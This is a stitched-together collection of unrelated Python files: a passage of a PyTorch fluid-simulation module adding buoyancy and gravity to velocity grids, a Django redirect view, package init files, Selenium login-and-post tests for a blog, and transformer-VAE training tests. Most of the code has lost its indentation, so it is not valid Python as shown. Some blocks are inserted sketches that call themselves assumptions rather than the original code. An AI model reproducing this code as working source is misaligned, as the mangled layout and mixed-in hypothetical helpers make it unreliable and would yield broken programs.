        U (Tensor): velocity field (size(1) can be 2 or 3, indicating 2D / 3D)
flags (Tensor): input occupancy grid.
density (Tensor): scalar density grid.
gravity (Tensor): 3D vector indicating direction of gravity.
dt (float): scalar timestep.
Output:
U (Tensor): Output velocity
"""
cuda = torch.device('cuda')
# Argument check
assert U.dim() == 5 and flags.dim() == 5 and density.dim() == 5,\
"Dimension mismatch"
assert flags.size(1) == 1, "flags is not scalar"
bsz = flags.size(0)
ch = flags.size(1)
d = flags.size(2)
h = flags.size(3)
w = flags.size(4)
is3D = (U.size(1) == 3)
bnd = 1
if not is3D:
assert d == 1, "2D velocity field but zdepth > 1"
assert U.size(1) == 2, "2D velocity field must have only 2 channels"
assert U.size(0) == bsz and U.size(2) == d and \
U.size(3) == h and U.size(4) == w, "Size mismatch"
assert density.is_same_size(flags), "Size mismatch"
assert U.is_contiguous() and flags.is_contiguous() and \
density.is_contiguous(), "Input is not contiguous"
assert gravity.dim() == 1 and gravity.size(0) == 3, \
"Gravity must be a 3D vector (even in 2D)"
# (aalgua) I don't know why Manta divides by dx, as in all other modules
# dx = 1.
strength = -gravity * dt
i = torch.arange(0, w, dtype=torch.long, device=cuda).view(1,w).expand(bsz, d, h, w)
j = torch.arange(0, h, dtype=torch.long, device=cuda).view(1,h,1).expand(bsz, d, h, w)
k = torch.zeros_like(i)
# Altitude!
h_alt = torch.arange(0, h, dtype=torch.float, device=cuda).view(1,h,1).expand(bsz, ch,d, h, w)
if (is3D):
k = torch.arange(0, d, dtype=torch.long, device=cuda).view(1,d,1,1).expand(bsz, d, h, w)
zero = torch.zeros_like(i)
zeroBy = torch.zeros(i.size(), dtype=torch.uint8, device=cuda)
zero_f = zero.cuda().float()
idx_b = torch.arange(start=0, end=bsz, dtype=torch.long, device=cuda) \
.view(bsz, 1, 1, 1).expand(bsz,d,h,w)
maskBorder = (i < bnd).__or__\
(i > w - 1 - bnd).__or__\
(j < bnd).__or__\
(j > h - 1 - bnd)
if (is3D):
maskBorder = maskBorder.__or__(k < bnd).__or__\
(k > d - 1 - bnd)
maskBorder = maskBorder.unsqueeze(1)
# No buoyancy on the border. Set continue (mCont) to false.
mCont = torch.ones_like(zeroBy).unsqueeze(1)
mCont.masked_fill_(maskBorder, 0)
isFluid = flags.eq(CellType.TypeFluid).__and__(mCont)
mCont.masked_fill_(isFluid.ne(1), 0)
mCont.squeeze_(1)
max_X = torch.zeros_like(zero).fill_(w-1)
max_Y = torch.zeros_like(zero).fill_(h-1)
i_l = zero.where( (i <= 0), i-1)
i_r = max_X.where( (i > w-2), i+1)
j_l = zero.where( (j <= 0), j-1)
j_r = max_Y.where( (j > h-2), j+1)
fluid100 = flags[idx_b, zero, k, j, i_l].eq(CellType.TypeFluid).__and__ \
(mCont)
#(flags[idx_b, zero, k, j, i_r].eq(CellType.TypeFluid)).__and__ \
#factor = strength[0] * ((density[idx_b, zero, k, j, i] -\
# density[idx_b, zero, k, j, i_l] ))
factor = 0.0
U[:,0].masked_scatter_(fluid100, (U.select(1,0) + factor).masked_select(fluid100))
fluid010 = flags[idx_b, zero, k, j_l, i].eq(CellType.TypeFluid).__and__ \
(mCont)
#(flags[idx_b, zero, k, j_r, i].eq(CellType.TypeFluid)).__and__ \
#fluid010 = zeroBy.where( j <= 0, (flags[idx_b, zero, k, j-1, i].eq(CellType.TypeFluid))).__and__(mCont)
factor = strength[1] * (h_alt*(density[idx_b, zero, k, j, i] -\
density[idx_b, zero, k, j_l, i] ))
#factor = strength[1] * (density.squeeze(1) - \
# zero_f.where( j <= 0, density[idx_b, zero, k, j-1, i]) )
U[:,1].masked_scatter_(fluid010, (U.select(1,1) + factor).masked_select(fluid010))
if (is3D):
        fluid001 = zeroBy.where( k <= 0, (flags[idx_b, zero, k-1, j, i].eq(CellType.TypeFluid))).__and__(mCont)
factor = strength[2] *(0.5* (density.squeeze(1) + \
zero_f.where(k <= 1, density[idx_b, zero, k-1, j, i]) ))
U[:,2].masked_scatter_(fluid001, (U.select(1,2) + factor).masked_select(fluid001))
return U
# *****************************************************************************
# addGravity
# *****************************************************************************
def addGravity(U, flags, gravity, dt):
r"""Add gravity force.
Arguments:
        U (Tensor): velocity field (size(1) can be 2 or 3, indicating 2D / 3D)
flags (Tensor): input occupancy grid.
gravity (Tensor): 3D vector indicating direction of gravity.
dt (float): scalar timestep.
Output:
U (Tensor): Output velocity
"""
cuda = torch.device('cuda')
# Argument check
assert U.dim() == 5 and flags.dim() == 5, "Dimension mismatch"
assert flags.size(1) == 1, "flags is not scalar"
bsz = flags.size(0)
d = flags.size(2)
h = flags.size(3)
w = flags.size(4)
is3D = (U.size(1) == 3)
bnd = 1
if not is3D:
assert d == 1, "2D velocity field but zdepth > 1"
assert U.size(1) == 2, "2D velocity field must have only 2 channels"
assert U.size(0) == bsz and U.size(2) == d and \
U.size(3) == h and U.size(4) == w, "Size mismatch"
assert U.is_contiguous() and flags.is_contiguous(), "Input is not contiguous"
assert gravity.dim() == 1 and gravity.size(0) == 3,\
"Gravity must be a 3D vector (even in 2D)"
# (aalgua) I don't know why Manta divides by dx, as in all other modules
# dx = 1.
force = gravity * dt
i = torch.arange(0, w, dtype=torch.long, device=cuda).view(1,w).expand(bsz, d, h, w)
j = torch.arange(0, h, dtype=torch.long, device=cuda).view(1,h,1).expand(bsz, d, h, w)
k = torch.zeros_like(i)
if (is3D):
k = torch.arange(0, d, dtype=torch.long, device=cuda).view(1,d,1,1).expand(bsz, d, h, w)
zero = torch.zeros_like(i)
zeroBy = torch.zeros(i.size(), dtype=torch.uint8, device=cuda)
zero_f = zero.float()
idx_b = torch.arange(start=0, end=bsz, dtype=torch.long, device=cuda) \
.view(bsz, 1, 1, 1).expand(bsz,d,h,w)
maskBorder = (i < bnd).__or__\
(i > w - 1 - bnd).__or__\
(j < bnd).__or__\
(j > h - 1 - bnd)
if (is3D):
maskBorder = maskBorder.__or__(k < bnd).__or__(k > d - 1 - bnd)
maskBorder = maskBorder.unsqueeze(1)
# No buoyancy on the border. Set continue (mCont) to false.
mCont = torch.ones_like(zeroBy).unsqueeze(1)
mCont.masked_fill_(maskBorder, 0)
cur_fluid = flags.eq(CellType.TypeFluid).__and__(mCont)
cur_empty = flags.eq(CellType.TypeEmpty).__and__(mCont)
mNotFluidNotEmpt = cur_fluid.ne(1).__and__(cur_empty.ne(1))
mCont.masked_fill_(mNotFluidNotEmpt, 0)
mCont.squeeze_(1)
#print()
#print('F = ')
#print(force)
#print('before')
#print(U)
#print(U.size())
fluid100 = (zeroBy.where( i <= 0, (flags[idx_b, zero, k, j, i-1].eq(CellType.TypeFluid))) \
.__or__(( zeroBy.where( i <= 0, (flags[idx_b, zero, k, j, i-1].eq(CellType.TypeEmpty)))) \
.__and__(cur_fluid.squeeze(1)))).__and__(mCont)
U[:,0].masked_scatter_(fluid100, (U[:,0] + force[0]).masked_select(fluid100))
fluid010 = (zeroBy.where( j <= 0, (flags[idx_b, zero, k, j-1, i].eq(CellType.TypeFluid))) \
.__or__(( zeroBy.where( j <= 0, (flags[idx_b, zero, k, j-1, i].eq(CellType.TypeEmpty)))) \
.__and__(cur_fluid.squeeze(1))) ).__and__(mCont)
U[:,1].masked_scatter_(fluid010, (U[:,1] + force[1]).masked_select(fluid010))
if (is3D):
fluid001 = (zeroBy.where( k <= 0, (flags[idx_b, zero, k-1, j, i].eq(CellType.TypeFluid))) \
.__or__(( zeroBy.where( k <= 0, (flags[idx_b, zero, k-1, j, i].eq(CellType.TypeEmpty)))) \
.__and__(cur_fluid.squeeze(1)))).__and__(mCont)
U[:,2].masked_scatter_(fluid001, (U[:,2] + force[2]).masked_select(fluid001))
#print('after')
#print(U)
#print(U.size())
return U
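# Minimal usage sketch (an assumption, not part of the original file). It presumes
# CellType.TypeFluid is an integer flag value, a CUDA device is available (the
# kernels above hard-code torch.device('cuda')), and a PyTorch version that still
# accepts uint8 masks in masked_fill_.
if __name__ == "__main__" and torch.cuda.is_available():
    bsz, d, h, w = 1, 1, 8, 8
    U = torch.zeros(bsz, 2, d, h, w, device="cuda")  # 2D velocity field (u, v)
    flags = torch.full((bsz, 1, d, h, w), int(CellType.TypeFluid), device="cuda")
    gravity = torch.tensor([0.0, -9.81, 0.0], device="cuda")
    U = addGravity(U, flags, gravity, dt=0.1)
    print(U[:, 1].mean())  # interior fluid faces picked up -9.81 * 0.1 in v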

# File: properties/views.py (repo: edilio/locator, license: MIT)
# from django.shortcuts import render
from django.shortcuts import redirect
ADMIN_PATH = '/admin'
def home(request):
return redirect(request.build_absolute_uri(ADMIN_PATH))
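# Hypothetical wiring sketch (not part of this file): in urls.py this view would
# be mapped to the site root so any visit redirects to the Django admin, e.g.
#   from django.urls import path
#   urlpatterns = [path('', home, name='home')]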

# File: aox/boilerplate/__init__.py (repo: costas-basdekis/aox, license: MIT)
from .base_boilerplate import *  # noqa: F401, F403
from .boilerplates import * # noqa: F401, F403

# File: simpleblog/tests/test_functional_tests.py (repo: blacktower2016/simpleblog, license: MIT)
from django.test import LiveServerTestCase
from selenium import webdriver
from django.urls import reverse
from django.utils.translation import activate, gettext_lazy as _
from .creation_utils import create_user, create_post
from simpleblog.models import Post
class TestPostCreate(LiveServerTestCase):
def setUp(self):
self.driver = webdriver.Firefox()
self.user = create_user()
#activate("en")
def test_log_in_and_create_new_post(self):
# user come to the simpleblog to create post
self.driver.get(self.live_server_url+reverse("simpleblog:create-post"))
self.assertEqual(Post.objects.count(), 0)
self.assertIn("<h2>Вход</h2>", self.driver.page_source)
# Oh, I forgot to log in!
self.driver.find_element_by_id("id_username").send_keys("user")
self.driver.find_element_by_id("id_password").send_keys("password")
self.driver.find_element_by_tag_name('button').click()
self.assertIn("user", self.driver.page_source)
# create post
self.driver.find_element_by_partial_link_text("Новая").click()
self.assertIn("Новая запись", self.driver.page_source)
self.driver.find_element_by_id("id_title").send_keys("New post title")
self.driver.find_element_by_id("id_subtitle").send_keys("New post subtitle")
self.driver.find_element_by_id("id_text").send_keys("New post text")
self.driver.find_element_by_id("id_tags").send_keys("New post tag")
self.driver.find_element_by_tag_name('button').click()
self.assertEqual(Post.objects.count(), 1)
def tearDown(self):
self.driver.quit()
class TestPostUpdate(LiveServerTestCase):
def setUp(self):
self.driver = webdriver.Firefox()
self.user = create_user()
self.post = create_post(author=self.user, is_public=True)
#activate("en")
def test_log_in_and_update_post(self):
# user come to the simpleblog to create post
self.driver.get(self.live_server_url+reverse("simpleblog:create-post"))
self.assertEqual(Post.objects.count(), 1)
self.assertIn("<h2>Вход</h2>", self.driver.page_source)
# Oh, I forgot to log in!
self.driver.find_element_by_id("id_username").send_keys("user")
self.driver.find_element_by_id("id_password").send_keys("password")
self.driver.find_element_by_tag_name('button').click()
self.assertIn("user", self.driver.page_source)
# create post
self.driver.find_element_by_partial_link_text("Мои записи").click()
self.driver.find_element_by_class_name("fa-edit").click()
self.assertIn("<h2>Редактирование записи</h2>", self.driver.page_source)
self.driver.find_element_by_id("id_title").send_keys("New post title")
self.driver.find_element_by_id("id_subtitle").send_keys("New post subtitle")
self.driver.find_element_by_id("id_text").send_keys("New post text")
self.driver.find_element_by_id("id_tags").send_keys("New post tag")
self.driver.find_element_by_tag_name('button').click()
self.assertEqual(Post.objects.count(), 1)
def tearDown(self):
self.driver.quit()
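# Hypothetical sketch of the helpers imported from .creation_utils (that module is
# not shown here); signatures and field names are inferred from the calls above,
# so treat this as an assumption rather than the real code.
def _create_user_sketch(username="user", password="password"):
    from django.contrib.auth import get_user_model
    return get_user_model().objects.create_user(username=username, password=password)
def _create_post_sketch(author, is_public=False, title="title", text="text"):
    return Post.objects.create(author=author, is_public=is_public, title=title, text=text)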
if __name__ == '__main__':
    import unittest
    unittest.main()

# File: landlab/utils/__init__.py (repo: SiccarPoint/landlab, license: MIT)
#!/usr/bin/env python
#import landlab.utils.count_repeats
#from landlab.utils.count_repeats import count_repeats
from landlab.utils.count_repeats import count_repeated_values

# File: pyc3dserver/__init__.py (repo: mkjung99/pyc3dserver, license: MIT)
from .pyc3dserver import __author__, __version__
from .pyc3dserver import *

# File: tests/test_train.py (repo: Fraser-Greenlee/transformer-vae, license: MIT)
import logging
import sys
from unittest.mock import patch
import torch
from transformers.testing_utils import TestCasePlus, torch_device
from transformer_vae.train import main, VAE_Trainer
logging.basicConfig(level=logging.DEBUG)
logger = logging.getLogger()
class TrainTests(TestCasePlus):
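    # Each test below assembles a CLI invocation as a string, patches sys.argv,
    # and calls train.main(); multi-GPU runs return early because the tiny
    # fixture files cannot fill enough batches without a drop_last option.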
def test_train_txt(self):
stream_handler = logging.StreamHandler(sys.stdout)
logger.addHandler(stream_handler)
tmp_dir = self.get_auto_remove_tmp_dir()
testargs = f"""
train.py
--train_file ./tests/fixtures/all_len_16.txt
--validation_file ./tests/fixtures/all_len_16.txt
--do_train
--do_eval
--per_device_train_batch_size 4
--per_device_eval_batch_size 4
--num_train_epochs 1
--set_seq_size 16
--n_latent_tokens 5
--latent_size 77
--output_dir {tmp_dir}
--overwrite_output_dir
""".split()
if torch.cuda.device_count() > 1:
# Skipping because there are not enough batches to train the model + would need a drop_last to work.
return
if torch_device != "cuda":
testargs.append("--no_cuda")
with patch.object(sys, "argv", testargs):
result = main()
self.assertAlmostEqual(result["epoch"], 2.0)
def test_train_csv(self):
stream_handler = logging.StreamHandler(sys.stdout)
logger.addHandler(stream_handler)
tmp_dir = self.get_auto_remove_tmp_dir()
testargs = f"""
train.py
--train_file ./tests/fixtures/multiline_max_len_4.csv
--validation_file ./tests/fixtures/multiline_max_len_4.csv
--do_train
--do_eval
--per_device_train_batch_size 5
--per_device_eval_batch_size 5
--num_train_epochs 2
--set_seq_size 5
--latent_size 2
--output_dir {tmp_dir}
--overwrite_output_dir
""".split()
if torch.cuda.device_count() > 1:
# Skipping because there are not enough batches to train the model + would need a drop_last to work.
return
if torch_device != "cuda":
testargs.append("--no_cuda")
with patch.object(sys, "argv", testargs):
result = main()
self.assertAlmostEqual(result["epoch"], 2.0)
def test_train_json(self):
stream_handler = logging.StreamHandler(sys.stdout)
logger.addHandler(stream_handler)
tmp_dir = self.get_auto_remove_tmp_dir()
testargs = f"""
train.py
--train_file ./tests/fixtures/max_len_3.json
--validation_file ./tests/fixtures/max_len_3.json
--do_train
--do_eval
--per_device_train_batch_size 5
--per_device_eval_batch_size 5
--num_train_epochs 2
--set_seq_size 4
--latent_size 2
--output_dir {tmp_dir}
--overwrite_output_dir
""".split()
if torch.cuda.device_count() > 1:
# Skipping because there are not enough batches to train the model + would need a drop_last to work.
return
if torch_device != "cuda":
testargs.append("--no_cuda")
with patch.object(sys, "argv", testargs):
result = main()
self.assertAlmostEqual(result["epoch"], 2.0)
def test_train_python_syntax_seq_check(self):
stream_handler = logging.StreamHandler(sys.stdout)
logger.addHandler(stream_handler)
tmp_dir = self.get_auto_remove_tmp_dir()
testargs = f"""
train.py
--train_file ./tests/fixtures/line_by_line_max_len_3.txt
--validation_file ./tests/fixtures/line_by_line_max_len_3.txt
--do_train
--do_eval
--sample_from_latent
--per_device_train_batch_size 4
--per_device_eval_batch_size 4
--num_train_epochs 1
--set_seq_size 8
--n_latent_tokens 1
--latent_size 2
--output_dir {tmp_dir}
--overwrite_output_dir
--seq_check python
""".split()
if torch.cuda.device_count() > 1:
# Skipping because there are not enough batches to train the model + would need a drop_last to work.
return
if torch_device != "cuda":
testargs.append("--no_cuda")
with patch.object(sys, "argv", testargs):
result = main()
self.assertAlmostEqual(result["epoch"], 1.0)
def test_train_non_vae(self):
stream_handler = logging.StreamHandler(sys.stdout)
logger.addHandler(stream_handler)
tmp_dir = self.get_auto_remove_tmp_dir()
testargs = f"""
train.py
--train_file ./tests/fixtures/line_by_line_max_len_3.txt
--validation_file ./tests/fixtures/line_by_line_max_len_3.txt
--do_train
--do_eval
--per_device_train_batch_size 4
--per_device_eval_batch_size 4
--num_train_epochs 2
--set_seq_size 4
--dont_use_reg_loss
--output_dir {tmp_dir}
--overwrite_output_dir
""".split()
if torch.cuda.device_count() > 1:
# Skipping because there are not enough batches to train the model + would need a drop_last to work.
return
if torch_device != "cuda":
testargs.append("--no_cuda")
with patch.object(sys, "argv", testargs):
result = main()
self.assertAlmostEqual(result["epoch"], 2.0)
def test_train_unsupervised_classification(self):
stream_handler = logging.StreamHandler(sys.stdout)
logger.addHandler(stream_handler)
tmp_dir = self.get_auto_remove_tmp_dir()
testargs = f"""
train.py
--dataset_name=Fraser/news-category-dataset
--text_column=headline
--classification_column=category_num
--do_eval
--per_device_train_batch_size 2
--per_device_eval_batch_size 2
--max_validation_size 100
--eval_steps 4
--latent_size 2
--output_dir {tmp_dir}
--overwrite_output_dir
""".split()
if torch.cuda.device_count() > 1:
# Skipping because there are not enough batches to train the model + would need a drop_last to work.
return
if torch_device != "cuda":
testargs.append("--no_cuda")
with patch.object(sys, "argv", testargs):
result = main()
self.assertGreater(result["eval_loss"], 0.0)
self.assertNotIn("epoch", result)
def test_train_n_tokens_model(self):
stream_handler = logging.StreamHandler(sys.stdout)
logger.addHandler(stream_handler)
tmp_dir = self.get_auto_remove_tmp_dir()
testargs = f"""
train.py
--train_file ./tests/fixtures/line_by_line_max_len_3.txt
--validation_file ./tests/fixtures/line_by_line_max_len_3.txt
--do_train
--per_device_train_batch_size 2
--num_train_epochs 1
--set_seq_size 4
--n_latent_tokens 2
--latent_size 2
--output_dir {tmp_dir}
--overwrite_output_dir
""".split()
if torch.cuda.device_count() > 1:
# Skipping because there are not enough batches to train the model + would need a drop_last to work.
return
if torch_device != "cuda":
testargs.append("--no_cuda")
with patch.object(sys, "argv", testargs):
main()
def test_train_unsupervised_classification_agnews(self):
stream_handler = logging.StreamHandler(sys.stdout)
logger.addHandler(stream_handler)
tmp_dir = self.get_auto_remove_tmp_dir()
testargs = f"""
train.py
--dataset_name=ag_news
--classification_column=label
--do_train
--max_steps=10
--validation_name=test
--test_classification
--per_device_train_batch_size 2
--per_device_eval_batch_size 2
--max_validation_size 100
--latent_size 2
--output_dir {tmp_dir}
--overwrite_output_dir
""".split()
if torch.cuda.device_count() > 1:
# Skipping because there are not enough batches to train the model + would need a drop_last to work.
return
if torch_device != "cuda":
testargs.append("--no_cuda")
with patch.object(sys, "argv", testargs):
main()
def test_train(self):
stream_handler = logging.StreamHandler(sys.stdout)
logger.addHandler(stream_handler)
tmp_dir = self.get_auto_remove_tmp_dir()
testargs = f"""
train.py
--train_file ./tests/fixtures/line_by_line_max_len_3.txt
--validation_file ./tests/fixtures/line_by_line_max_len_3.txt
--do_train
--do_eval
--eval_steps 3
--evaluation_strategy steps
--sample_from_latent
--per_device_train_batch_size 2
--per_device_eval_batch_size 2
--num_train_epochs 1
--set_seq_size 8
--n_latent_tokens 1
--latent_size 2
--output_dir {tmp_dir}
--overwrite_output_dir
""".split()
if torch.cuda.device_count() > 1:
# Skipping because there are not enough batches to train the model + would need a drop_last to work.
return
if torch_device != "cuda":
testargs.append("--no_cuda")
with patch.object(sys, "argv", testargs):
result = main()
self.assertAlmostEqual(result["epoch"], 1.0)
def test_train_critic(self):
stream_handler = logging.StreamHandler(sys.stdout)
logger.addHandler(stream_handler)
tmp_dir = self.get_auto_remove_tmp_dir()
testargs = f"""
train.py
--train_file ./tests/fixtures/line_by_line_max_len_3.txt
--validation_file ./tests/fixtures/line_by_line_max_len_3.txt
--do_train
--do_eval
--eval_steps 3
--evaluation_strategy steps
--sample_from_latent
--per_device_train_batch_size 4
--per_device_eval_batch_size 4
--num_train_epochs 1
--set_seq_size 8
--n_latent_tokens 1
--latent_size 2
--transformer_critic_name funnel-transformer/intermediate
--output_dir {tmp_dir}
--overwrite_output_dir
""".split()
if torch.cuda.device_count() > 1:
# Skipping because there are not enough batches to train the model + would need a drop_last to work.
return
if torch_device != "cuda":
testargs.append("--no_cuda")
with patch.object(sys, "argv", testargs):
result = main()
self.assertAlmostEqual(result["epoch"], 1.0)
def test_train_cycle_loss(self):
stream_handler = logging.StreamHandler(sys.stdout)
logger.addHandler(stream_handler)
tmp_dir = self.get_auto_remove_tmp_dir()
testargs = f"""
train.py
--train_file ./tests/fixtures/line_by_line_max_len_3.txt
--validation_file ./tests/fixtures/line_by_line_max_len_3.txt
--do_train
--do_eval
--eval_steps 3
--evaluation_strategy steps
--sample_from_latent
--per_device_train_batch_size 4
--per_device_eval_batch_size 4
--num_train_epochs 1
--set_seq_size 8
--n_latent_tokens 1
--latent_size 2
--cycle_loss
--output_dir {tmp_dir}
--overwrite_output_dir
""".split()
if torch.cuda.device_count() > 1:
# Skipping because there are not enough batches to train the model + would need a drop_last to work.
return
if torch_device != "cuda":
testargs.append("--no_cuda")
with patch.object(sys, "argv", testargs):
result = main()
self.assertAlmostEqual(result["epoch"], 1.0)
def test_interpolate_training_step_rate(self):
stream_handler = logging.StreamHandler(sys.stdout)
logger.addHandler(stream_handler)
tmp_dir = self.get_auto_remove_tmp_dir()
testargs = f"""
train.py
--train_file ./tests/fixtures/line_by_line_max_len_3.txt
--validation_file ./tests/fixtures/line_by_line_max_len_3.txt
--do_train
--do_eval
--eval_steps 3
--evaluation_strategy steps
--sample_from_latent
--per_device_train_batch_size 4
--per_device_eval_batch_size 4
--interpolate_training_step_rate 2
--cycle_loss
--transformer_critic_name funnel-transformer/intermediate
--num_train_epochs 1
--set_seq_size 8
--min_critic_steps 1
--n_latent_tokens 1
--latent_size 2
--output_dir {tmp_dir}
--overwrite_output_dir
""".split()
if torch.cuda.device_count() > 1:
# Skipping because there are not enough batches to train the model + would need a drop_last to work.
return
if torch_device != "cuda":
testargs.append("--no_cuda")
with patch.object(sys, "argv", testargs):
result = main()
self.assertAlmostEqual(result["epoch"], 1.0)
def test_train_latent_decoder_t5_norm(self):
stream_handler = logging.StreamHandler(sys.stdout)
logger.addHandler(stream_handler)
tmp_dir = self.get_auto_remove_tmp_dir()
testargs = f"""
train.py
--train_file ./tests/fixtures/line_by_line_max_len_3.txt
--validation_file ./tests/fixtures/line_by_line_max_len_3.txt
--do_train
--do_eval
--decoder_model t5_norm
--per_device_train_batch_size 4
--per_device_eval_batch_size 4
--num_train_epochs 2
--set_seq_size 5
--latent_size 2
--output_dir {tmp_dir}
--overwrite_output_dir
""".split()
if torch.cuda.device_count() > 1:
# Skipping because there are not enough batches to train the model + would need a drop_last to work.
return
if torch_device != "cuda":
testargs.append("--no_cuda")
with patch.object(sys, "argv", testargs):
result = main()
self.assertAlmostEqual(result["epoch"], 2.0)
def test_train_latent_decoder_funnel_norm(self):
stream_handler = logging.StreamHandler(sys.stdout)
logger.addHandler(stream_handler)
tmp_dir = self.get_auto_remove_tmp_dir()
testargs = f"""
train.py
--train_file ./tests/fixtures/line_by_line_max_len_3.txt
--validation_file ./tests/fixtures/line_by_line_max_len_3.txt
--do_train
--do_eval
--decoder_model funnel_norm
--per_device_train_batch_size 4
--per_device_eval_batch_size 4
--num_train_epochs 2
--set_seq_size 5
--latent_size 2
--output_dir {tmp_dir}
--overwrite_output_dir
""".split()
if torch.cuda.device_count() > 1:
# Skipping because there are not enough batches to train the model + would need a drop_last to work.
return
if torch_device != "cuda":
testargs.append("--no_cuda")
with patch.object(sys, "argv", testargs):
result = main()
self.assertAlmostEqual(result["epoch"], 2.0)
def test_train_vae_cycle_loss(self):
stream_handler = logging.StreamHandler(sys.stdout)
logger.addHandler(stream_handler)
tmp_dir = self.get_auto_remove_tmp_dir()
testargs = f"""
train.py
--train_file ./tests/fixtures/line_by_line_max_len_3.txt
--validation_file ./tests/fixtures/line_by_line_max_len_3.txt
--do_train
--do_eval
--vae_cycle_loss
--per_device_train_batch_size 4
--per_device_eval_batch_size 4
--num_train_epochs 2
--set_seq_size 5
--latent_size 2
--output_dir {tmp_dir}
--overwrite_output_dir
""".split()
if torch.cuda.device_count() > 1:
# Skipping because there are not enough batches to train the model + would need a drop_last to work.
return
if torch_device != "cuda":
testargs.append("--no_cuda")
with patch.object(sys, "argv", testargs):
result = main()
self.assertAlmostEqual(result["epoch"], 2.0)
def test_train_deepspeed(self):
'''
Can only run with CUDA.
'''
stream_handler = logging.StreamHandler(sys.stdout)
logger.addHandler(stream_handler)
tmp_dir = self.get_auto_remove_tmp_dir()
testargs = f"""
train.py
--deepspeed deepspeed/ds_config.json
--train_file ./tests/fixtures/line_by_line_max_len_3.txt
--validation_file ./tests/fixtures/line_by_line_max_len_3.txt
--do_train
--do_eval
--per_device_train_batch_size 4
--per_device_eval_batch_size 4
--num_train_epochs 2
--set_seq_size 5
--latent_size 2
--output_dir {tmp_dir}
--overwrite_output_dir
""".split()
if torch.cuda.device_count() > 1:
# Skipping because there are not enough batches to train the model + would need a drop_last to work.
return
if torch_device != "cuda":
testargs.append("--no_cuda")
with patch.object(sys, "argv", testargs):
result = main()
self.assertAlmostEqual(result["epoch"], 2.0)
def test_train_adafactor(self):
stream_handler = logging.StreamHandler(sys.stdout)
logger.addHandler(stream_handler)
tmp_dir = self.get_auto_remove_tmp_dir()
testargs = f"""
train.py
--adafactor
--train_file ./tests/fixtures/line_by_line_max_len_3.txt
--validation_file ./tests/fixtures/line_by_line_max_len_3.txt
--do_train
--do_eval
--per_device_train_batch_size 4
--per_device_eval_batch_size 4
--num_train_epochs 2
--set_seq_size 5
--latent_size 2
--output_dir {tmp_dir}
--overwrite_output_dir
""".split()
if torch.cuda.device_count() > 1:
# Skipping because there are not enough batches to train the model + would need a drop_last to work.
return
if torch_device != "cuda":
testargs.append("--no_cuda")
with patch.object(sys, "argv", testargs):
result = main()
self.assertAlmostEqual(result["epoch"], 2.0)
def test_train_local_gpt2_tokenizer(self):
stream_handler = logging.StreamHandler(sys.stdout)
logger.addHandler(stream_handler)
tmp_dir = self.get_auto_remove_tmp_dir()
testargs = f"""
train.py
--train_file ./tests/fixtures/all_len_16.txt
--validation_file ./tests/fixtures/all_len_16.txt
--do_train
--do_eval
--tokenizer_name tokenizers/tkn_mnist-text-small_byte
--per_device_train_batch_size 4
--per_device_eval_batch_size 4
--num_train_epochs 2
--set_seq_size 16
--latent_size 2
--output_dir {tmp_dir}
--overwrite_output_dir
""".split()
if torch.cuda.device_count() > 1:
# Skipping because there are not enough batches to train the model + would need a drop_last to work.
return
if torch_device != "cuda":
testargs.append("--no_cuda")
with patch.object(sys, "argv", testargs):
result = main()
self.assertAlmostEqual(result["epoch"], 2.0)
def test_train_render_text_image(self):
stream_handler = logging.StreamHandler(sys.stdout)
logger.addHandler(stream_handler)
tmp_dir = self.get_auto_remove_tmp_dir()
testargs = f"""
train.py
--dataset_name=Fraser/mnist-text-default
--eval_steps 2
--validation_name test
--do_eval
--tokenizer_name tokenizers/tkn_mnist-text-small_byte
--sample_from_latent
--render_text_image
--seq_check python
--dont_clean_up_tokenization_spaces
--per_device_train_batch_size 2
--per_device_eval_batch_size 2
--num_train_epochs 2
--set_seq_size 237
--generate_max_len 2
--latent_size 2
--output_dir {tmp_dir}
--overwrite_output_dir
""".split()
if torch.cuda.device_count() > 1:
# Skipping because there are not enough batches to train the model + would need a drop_last to work.
return
if torch_device != "cuda":
testargs.append("--no_cuda")
with patch.object(sys, "argv", testargs):
result = main()
self.assertAlmostEqual(result["epoch"], 2.0)
def test_train_grad_checkpoint(self):
stream_handler = logging.StreamHandler(sys.stdout)
logger.addHandler(stream_handler)
tmp_dir = self.get_auto_remove_tmp_dir()
testargs = f"""
train.py
--decoder_grad_chk_pnt_rate=3
--gradient_checkpoint_encoder
--train_file ./tests/fixtures/line_by_line_max_len_3.txt
--validation_file ./tests/fixtures/line_by_line_max_len_3.txt
--do_train
--do_eval
--per_device_train_batch_size 4
--per_device_eval_batch_size 4
--num_train_epochs 2
--set_seq_size 5
--latent_size 2
--output_dir {tmp_dir}
--overwrite_output_dir
""".split()
if torch.cuda.device_count() > 1:
# Skipping because there are not enough batches to train the model + would need a drop_last to work.
return
if torch_device != "cuda":
testargs.append("--no_cuda")
with patch.object(sys, "argv", testargs):
result = main()
self.assertAlmostEqual(result["epoch"], 2.0)
def test_train_window_attn_overlap_every_other_layer(self):
stream_handler = logging.StreamHandler(sys.stdout)
logger.addHandler(stream_handler)
tmp_dir = self.get_auto_remove_tmp_dir()
testargs = f"""
train.py
--attention_window_size=7
--train_file ./tests/fixtures/all_len_16.txt
--validation_file ./tests/fixtures/all_len_16.txt
--do_train
--do_eval
--per_device_train_batch_size 4
--per_device_eval_batch_size 4
--num_train_epochs 2
--set_seq_size 16
--latent_size 2
--output_dir {tmp_dir}
--overwrite_output_dir
""".split()
if torch.cuda.device_count() > 1:
# Skipping because there are not enough batches to train the model + would need a drop_last to work.
return
if torch_device != "cuda":
testargs.append("--no_cuda")
with patch.object(sys, "argv", testargs):
result = main()
self.assertAlmostEqual(result["epoch"], 2.0)
def test_gradual_interpolation_inputs(self):
latent_start = torch.tensor([[1.0, 1.0], [3.0, 4.0], [5.0, 6.0]])
latent_end = torch.tensor([[-1.0, -1.0], [7.0, 8.0], [9.0, 10.0]])
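        # Smoke test: only checks that the interpolation helper runs without
        # raising; the interpolated latents themselves are not asserted.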
VAE_Trainer.gradual_interpolation_inputs(latent_start, latent_end, 'cpu', False)
